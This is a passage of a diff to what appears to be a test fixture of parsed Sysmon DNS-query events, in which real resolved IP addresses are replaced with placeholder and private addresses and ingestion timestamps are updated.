"192.168.92.30", "type": "A" }, { @@ -5956,7 +5877,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5965,14 +5886,14 @@ } ], "resolved_ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -5990,21 +5911,21 @@ "image2.pubmatic.com" ], "ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741476800Z", + "ingested": "2021-12-09T13:50:23.456882Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6076,12 +5997,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { @@ -6099,13 +6020,13 @@ "sam.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741485500Z", + "ingested": "2021-12-09T13:50:23.456887700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6165,23 +6086,23 @@ }, "answers": [ { - "data": "52.85.89.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.94", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.139", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6189,7 +6110,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6197,7 +6118,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6205,7 +6126,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6214,17 +6135,17 @@ } ], "resolved_ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -6240,24 +6161,21 @@ "ocsp.sca1b.amazontrust.com" ], "ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741494100Z", + "ingested": "2021-12-09T13:50:23.456893400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6325,17 +6243,17 @@ "type": "CNAME" }, { - "data": "185.167.164.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "185.167.164.42", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -6352,14 +6270,13 @@ "c1.adform.net" ], "ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741502700Z", + "ingested": "2021-12-09T13:50:23.456899200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6427,11 +6344,11 @@ "type": "CNAME" }, { - "data": "40.84.140.84", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6439,7 +6356,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6447,17 +6364,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -6474,18 +6391,18 @@ "urs.microsoft.com" ], "ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741511200Z", + "ingested": "2021-12-09T13:50:23.456905300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6553,12 +6470,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -6575,13 +6492,13 @@ "dsum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741519800Z", + "ingested": "2021-12-09T13:50:23.456911200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6645,12 +6562,12 @@ "type": "CNAME" }, { - "data": "72.167.239.239", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "network": { @@ -6666,13 +6583,13 @@ "ocsp.godaddy.com" ], "ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741528300Z", + "ingested": "2021-12-09T13:50:23.456917100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 